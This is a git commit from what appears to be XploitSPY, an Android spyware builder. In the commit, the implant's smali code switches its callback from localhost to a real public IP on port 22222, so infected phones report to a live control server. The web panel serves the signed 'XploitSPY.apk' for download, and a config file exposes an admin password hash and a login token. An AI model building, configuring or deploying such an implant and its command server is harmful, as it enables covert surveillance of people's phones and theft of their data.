Fixed download link

This commit is contained in:
Chris 2020-01-11 16:23:10 +00:00
parent c9ffd62dfd
commit 577bf2f3db
8 changed files with 11 additions and 6 deletions

View File

@ -64,7 +64,7 @@
invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
const-string v2, "http://127.0.0.1:22222?model="
const-string v2, "http://3.6.95.182:22222?model="
invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

View File

@ -41,7 +41,7 @@
<div class="ui form" id="download" style="display: none">
<div class="inline fields">
<div class="eight wide field">
<a class="blue ui fluid button" download="XploitSPY.apk" href="/build.s.apk"><i
<a class="blue ui fluid button" download="XploitSPY.apk" href="/build-aligned-signed.apk"><i
class="download icon"></i>Download</a>
</div>
</div>
@ -101,4 +101,4 @@
<% include partials/footer.ejs %>
</body>
</html>
</html>

Binary file not shown.

View File

@ -2,7 +2,7 @@
"admin": {
"username": "admin",
"password": "5f4dcc3b5aa765d61d8327deb882cf99",
"loginToken": "4dd3330252bce2d920ce8ed89c1be2f8",
"loginToken": "b7b6c4683ac1999e0a4581d80470ab85",
"logs": [
{
"time": "2020-01-11T15:23:07.971Z",
@ -13,6 +13,11 @@
"time": "2020-01-11T15:27:32.586Z",
"type": "SUCCESS",
"message": "Build Succeded!"
},
{
"time": "2020-01-11T16:08:04.582Z",
"type": "SUCCESS",
"message": "Build Succeded!"
}
],
"ipLog": []

View File

@ -873,4 +873,4 @@
"integrity": "sha1-AI4G2AlDIMNy28L47XagymyKxBk="
}
}
}
}

View File

@ -17,4 +17,4 @@
"lowdb": "^1.0.0",
"socket.io": "^2.2.0"
}
}
}